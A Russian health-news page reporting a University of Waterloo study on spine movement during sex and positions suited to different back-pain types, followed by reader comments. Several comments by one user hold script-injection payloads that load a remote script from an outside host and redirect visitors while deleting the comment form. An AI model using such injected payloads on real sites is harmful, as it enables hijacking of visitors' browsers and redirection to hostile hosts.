Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Вам хочется секса, а у му...  >>  Вам хочется секса, а у мужа болит спина! Как получить свое?
 
Обратная связь
 

Вам хочется секса, а у мужа болит спина! Как получить свое?

Размер шрифта
26 июня 2015 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Согласно ученым из Университета Ватерлоо, вопреки распространенному мнению, сексуальная поза «ложки» – не самая здоровая для вашей спины.

Специалисты тщательно изучили механизм движения позвоночника во время секса и определили позы, наиболее полезные для него.

Вот что говорит по этому поводу профессор Стюарт МакГилл с факультета прикладных естественных наук Университета Ватерлоо: «Терапевтов и других врачей нередко спрашивают, как избавиться от боли в спине во время или после секса. Некоторые пары даже отказываются от этого удовольствия, так как одна ночь любви может привести к месяцу болей в пояснице. Однако до настоящего времени не проводилось никаких исследований данной проблемы, и врачи не могли помочь таким парам».

В инновационном исследовании с использованием инфракрасных и электромагнитных технологий врачи изучали движение позвоночника у 10 пар, занимавшихся сексом в 5 различных позах. Полученные результаты послужили основой для создания рекомендаций по занятию сексом в зависимости от источника боли.

«Врачи нередко рекомендуют парам, в которых один или оба партнера жалуются на боли в спине, позицию в сексе, известную под названием «ложки». Однако то, что подходит при одном типе боли, не оказывает никакого эффекта при другом», – объясняет Натали Сидеркевич, аспирант из Университета Ватерлоо и один из авторов исследования.

На основании данного исследования врачи разработали следующие рекомендации.

Если у вашего мужа боль в спине, чувствительная к растяжениям (то есть ему больно доставать до кончиков пальцев ног или долго сидеть), то вам подойдет поза «догги-стайл» или «по-собачьи». Для таких мужчин предпочтительны позы, в которых в большей степени задействованы бедра, а не спина.

Уникальность исследования заключается в том, что теперь врачи могут с полным научным обоснованием рекламировать парам те или иные позы. Это помогает укрепить отношения между партнерами и улучшает качество жизни.

Согласно канадской статистики, 4 из 5 людей когда-либо испытывали эпизоды сильнейшей боли в спине, которая надолго нарушала привычный ритм жизни. 84% мужчин и 73% женщин признались, что при болях в спине количество сексуальных контактов в их паре резко снижается.

Кроме того, данное исследование пролило немного больше света на мужской оргазм. Оказывается, во время оргазма в большей степени задействованы мышцы ягодиц и брюшного пресса, но не спины. 

По словам Сидеркевич, многие пациенты с проблемной спиной испытывают настолько сильные боли во время оргазма, что избегают достигать его во время секса. В данном исследовании положено начало пониманию природы этой боли.

Результаты были опубликованы в журнале Spine. Теперь мы с нетерпением ожидаем другой порции выводов, которая касается женщин. На настоящий момент планируется подобное исследование с людьми, испытывающими боли в бедрах, и дальнейшее изучение болей в спине.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

29 июня 2015 в 23:50

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 18:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 21:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:08

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

6 - Гость

03 июля 2015 в 14:38

Комментарий удален за нарушение Правил общения

Статьи

       
Как заниматься сексом, если болит спина?   Стыдные вопросы про секс   Как научить мужа доставлять вам удовольствие в постели   Лучший секс в жизни за 2 недели! Вторая неделя  
26 апреля 2013Не заставляйте мужчин убираться дома! Последнее исследование показало, что у таких пар меньше секса! 12 декабря 2012Гормон оргазма не дает мужчинам изменять
 
18 сентября 2012Нет презерватива? Будет рак простаты! 09 июля 2013Майкл Дуглас заболел раком гортани из-за орального секса! Как дальше жить?
 

Слайдшоу

1
Как остаться сексуальной с болезнью легких
Секреты сексуально удовлетворенных женщин
Почему болит во время секса?

Тесты

1
Какой матрас вам подходит?
Какая у вас стадия остеохондроза?
Рискуете ли вы заболеть остеохондрозом?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.